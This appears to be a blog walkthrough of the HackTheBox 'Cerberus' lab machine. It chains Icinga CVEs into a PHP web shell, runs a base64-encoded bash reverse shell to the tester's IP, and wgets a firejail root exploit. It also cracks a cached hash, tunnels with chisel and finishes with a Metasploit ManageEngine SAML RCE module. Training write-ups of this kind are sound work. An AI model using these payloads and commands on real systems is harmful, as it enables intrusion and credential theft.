HTB - Cerberus

HTB – Cerberus

In this walk through, we will be going through the Cerberus room from HackTheBox. This room is rated as Hard on the platform and it consists of exploitation of a RCE in Icinga web application and abuse of firejail SUID binary to perform a container breakout. For privilege escalation, Kerberos was exploited with a known CVE. So, let’s get started without any delay.

Cerberus

Machine Info:

TitleCerberus
IPaddress10.10.11.205
DifficultyHard
OSWindows
DescriptionCerberus is a hard difficulty Windows machine that requires exploitation of Icinga web application with an RCE. For Container breakout, Firejail SUID is abused and for privilege escalation, kerberos installation was exploited to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only port opened – 8080 (HTTP).

$ sudo nmap -A 10.10.11.205
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-23 21:01 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.205, 16) => Operation not permitted
Offending packet: TCP 10.10.14.18:36441 > 10.10.11.205:53 S ttl=37 id=26195 iplen=44  seq=4017810747 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.205, 16) => Operation not permitted
Offending packet: TCP 10.10.14.18:36442 > 10.10.11.205:53 S ttl=47 id=43148 iplen=44  seq=4017876282 win=1024 <mss 1460>
Nmap scan report for 10.10.11.205
Host is up (0.17s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
| vulners: 
|   cpe:/a:apache:http_server:2.4.52: 
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|_    	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   178.88 ms 10.10.14.1
2   179.43 ms 10.10.11.205

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.81 seconds

nmap scan

  • Performed an UDP nmap scan and found two ports opened – 123 (NTP) and 389 (LDAP).

sudo nmap -sU 10.10.11.205

nmap UDP scan

  • The web application on port 80 is redirecting to a hostname – icinga.cerberus.local. So, added it to my /etc/hosts file.

adding hostname

  • Accessed the application and it prompted me with a icinga login panel. Tried default username/password combo however got no luck.

Icinga web portal

Incorrect password

  • Upon checking on google for any known vulnerabilities related to Icinga. Got one, CVE-2022-24716 – Arbitary File Disclosure. Using this vulnerability we can read sensitive files on the icinga installation. So, used it to read the contents of resources.ini file and thus got the username password combination required to login into the icinga panel.

http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini

got some creds

  • Once logged into the dashboard. Checked the running Icinga version in the System section. It reveals the running version is 2.9.2.

Logged into the Incinga

Icinga 2.9.2 version running

Initial Access:

  • Checked for any known vulnerabilites for the concerned version and got one – An Authenticated Remote Code Execution Vulnerabilty (CVE-2022-24715). As per NVD, Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. So, we will perform the same, let’s generated the ssh key pair first.

ssh-keygen -m pem

ssh-keygen

  • “Create a New Resource” in the Configuration -> Application section.

Create a new resource

  • Changed the resource type to “SSH Identity”, Resource name “evil” and User to “../../../../../../dev/shm/run.php” and at last, add the generated RSA private key along with a php system shell command.

Resource entry

-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
\x00<?php system($_REQUEST["cmd"]);?>

adding our payload

  • If everything goes well, add the reverse shell one-liner encoded in base 64 with the RSA private key in the private key section again.

echo "sh -i >& /dev/tcp/10.10.14.18/4444 0>&1" | base64 -w 0

c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTgvNDQ0NCAwPiYxCg==

HTB - Cerberus

<?php
{
	system("echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTgvNDQ0NCAwPiYxCg==|base64 -d|bash");
}
?>

-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----

Save the file

  • The new resource test will be added to our resource list.

Resource added

  • Now Go to General and change the module path to /dev/shm.

Changing the module path

  • Now we will go to the module type and enable the state of the module. Once the training module get executed, we will get a connection back at our netcat listener.

start training

Training enabled

got the shell

Container Breakout:

  • Using Linpeas, found out an unusual binary named firejail which has SUID bit set to it.

linpeas output

  • Checked the firejail binary version using the below command.

firejail --version

firejail version

  • Checked the concerned firejail version for any known vulnerabilities and got one which can grant us root access.

Exploit: https://seclists.org/oss-sec/2022/q2/188

Exploit code

  • Downloaded the exploit on to the target and fired it.

wget http://10.10.14.18:8000/firejoin.py

chmod +x firejoin.py

./firejoin.py

downloading the exploit on target

  • Got root shell access on icinga by following the exploit instructions and joining the created firejail process.

firejail --join=19113

su -

got root shell

  • This seems like a container. Upon checking the running processes, it reveals a domain related process running for cerberus.local.

ps aux | grep root

checking the container processes

  • I looked inside the /var/lib/sss/db directory and checked the strings data of the cache_cerberus.local.ldb file which gives a hash back.

strings cache_cerberus.local.ldb | sort -u | head

got a password hash

  • Cracked the hash using hashcat reveals the password for user matthew.

hashcat -m 1800 hash.txt rockyou.txt -O

got matthew password

Searching for Kerberos files

  • As we are inside the container, so i checked the other subnet on the network using below command.

ip addr

ip addr

  • Next, performed a port scan on other subnet using PortScan-CLI.py script which reveals an intersting port – 5985 (WinRM) indicating a Windows Environment.

python3 PortScan-CLI.py 172.16.22.1 1 65535

performing local port scan

  • Performed a port forwarding using chisel and accessed the network using port 5985.

./chisel server --reverse -port 19000

port forwarding 19000

./chisel client 10.10.14.18:19000 R:5985:172.16.22.1:5985

chisel executed

adding hostname

  • Using Evil-WinRM got our initial shell access as user matthew and captured the user flag.

evil-winrm.rb -i 127.0.0.1 -u matthew -p 147258369

user flag

Privilege Escalation:

  • Next, checked the listening port on the machine. Got an interesting on – 9251 that runs ADSelfService Plus which is an Active Directory management utility created by ManageEngine .

netstat -ano

netstat -ano

  • Upon enumerating further on the running service, reveals that it is vulnerable to Remote Code Execution (CVE-2022-47966). So, for that downloaded the chisel windows binary onto the target and added the domain to my /etc/hosts file.

C:\Program Files (x86)\ManageEngine\ADSelfService Plus\conf\server.xml

Chisel (Windows) – https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_windows_amd64.gz

adding hostname

  • Performed a Sock5 port forwarding to access the application running on port 8888.

./chisel server --socks5 -p 6666 --reverse

chisel tunneling

  • Connected with the server on port 6666 and added my proxy configuration for port 8888.

.\chisel.exe client 10.10.14.18:6666 R:8888:socks

executing the chisel client

Foxyproxy configuration

  • Accessed the below URL which reveals a login panel. Tried to login with user matthew creds, got in but found nothing useful.

Cerberus.local – https://dc.cerberus.local:9251

https://dc.cerberus.local/adfs/ls/?SAMLRequest=pVNNj9MwFLzzKyLfm8RuSFKr6aq0rKjUhajNcuCCXPulaymxi%2B10u%2F8epx9LQVAkOFmy5703b2Y8vju0TbAHY6VWBcJhjAJQXAuptgV6rO4HObqbvBlb1jZkR6ede1Ir%2BNaBdcHUWjDO1820sl0LZg1mLzk8rpYFenJuZ2kUzWd0RN7iqG%2Bw1FupojRjucAxTkdxEhPBU5ZmSbLJa56zjDPMeJ3nG1KjYO6nSMXckdqloeAhB7MB09mw0Zw1ERO1jRoboWAxL9BXFjOSESzqWuSCj%2Bp0k%2BCEcEyyhGA%2BTD3M2g4WyjqmXIFITIYDTAZkWOGcJoTGWZjg4RcUlEY7zXXzTqqTHp1RVDMrLVWsBUsdp%2Bvpw5KSMKabE8jSD1VVDspP6%2BrYYC8FmI8eXaAHptgW3isvAgTT%2BRqa%2BqxYUDadRcHniw2kt8Eboyw9CX979O7ME01OPtHjgia416Zl7nZtfyPFoD5CKSgn3ctPs2%2BXs0sG0OT%2FHR9H1%2FQnl9D16i3mpW4kfwmmTaOfZwaY84o60wH665o4xL%2Bs2Sm7Ay5rCQJFr3POuQZxTLkPtYODC2a63TEjbe8LHBh3rypfw2aNV2IF9T8pdxPGKe97%2B%2BvSH8%2FaiD6WwD3PyjC%2FiDbuItzvGE3Oj3%2FY78fz9d%2BefAc%3D&RelayState=aHR0cHM6Ly9EQzo5MjUxL3NhbWxMb2dpbi9MT0dJTl9BVVRIpVNdj9MwEHznV1h+bz5MLk2tJqfScqJSD6I2xwMvyHE2PUuOXWynd/fvcfpxFARFAilKJHt2d3ZmMr197iTag7FCqxzHQYQRKK4bobY5fqjuRhm+Ld5MLesk2dFZ7x7VGr71YB2aWQvG+bq5VrbvwGzA7AWHh/Uqx4/O7SwNw8WcTshNHA4NVnorVJiOWdbEUZxOoiQiDU9ZOk6SOmt5xsacxYy3WVaTFqOFnyIUcwdq54YNDziYGkxvA6k5kyFrWhtKG2K0XOT4K/Dspm14ndUJSzOScR5l2SQZx8S/Gk48zNoelso6plyOSUTejiL/TKo4ocmEEhKk4+gLRqXRTnMt3wl11KM3impmhaWKdWCp43Qzu19REkS0PoIs/VBV5aj8tKkODfaiAfPRo3N8zxTbwnvlRQA0W2xAtifFUCl7i9Hnsw1
ksMEboyw9Cn999O7EExdHn+hhQYPutOmYu147nIhm1B6gFJQT7uWn2dfL2TkDuPh/x6fhJf3iHLpBveWi1FLwFzSTUj/NDTDnFXWmB/zXNeMg/mXNXtkdcNEKaHD4OueUa2gOKfehdvDs0Fx3O2aEHXyBZ8bdq8qXsLn0Sqyh/SflrsI45UNvf1z6z5M2zRBL4J5nZZhfRBt3Fu53jIrT5R/2+3F9+W8X3wE=

cerberus.local

Cerberus Login panel

  • The interesting thing to note here is the GUID in the URL which is required for further exploitation.

https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

checking the URL

  • Got the issuer_url in the FederationMetadata.xml file.

URL – https://dc.cerberus.local/FederationMetadata/2007-06/FederationMetadata.xml

FederationMetadata.xml

  • Now its’s time to exploit the vulnerability. With the above found information, i set the required exploit parameters and hit on exploit which grants me a root shell finally.

msfconsole -q

use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966

set payload payload/cmd/windows/powershell_reverse_tcp

set guid 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

set issuer_url http://dc.cerberus.local/adfs/services/trust

set proxies socks5:127.0.0.1:8888

set rhosts 127.0.0.1

set lhost tun0

set lport 1234

run

getting root

  • At last, captured the root flag and completed the room.

root flag

machine completed

Also Read: HTB – Blackfield

Conclusion:

Conclusion

So that was “Cerberus” for you. This machine initially presents a scant range of open services. The primary point of entry was through exploiting a pre-authentication vulnerability in an outdated Icinga web application, which then leads to Remote Code Execution (RCE) and subsequently a reverse shell within a Linux container. Here, a Firejail SUID binary was discovered, which can be manipulated for privilege escalation inside the container using CVE-2022-31214. Further investigation reveals that the machine utilizes Kerberos authentication with sssd, harboring a cached credential hash. Once cracked, this credential was then reused on the host machine, although this necessitates the forwarding of the WinRM port for access. Various local ports, some specific to ADSelfService were found active on the host machine. we authenticated through SAML, and found out a known CVE (CVE-2022-47966) with an available Metasploit module. The final hurdle involved careful enumeration of the filesystem to locate a ManageEngine backup, which provided the necessary data for exploiting ADSS SAML authentication to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top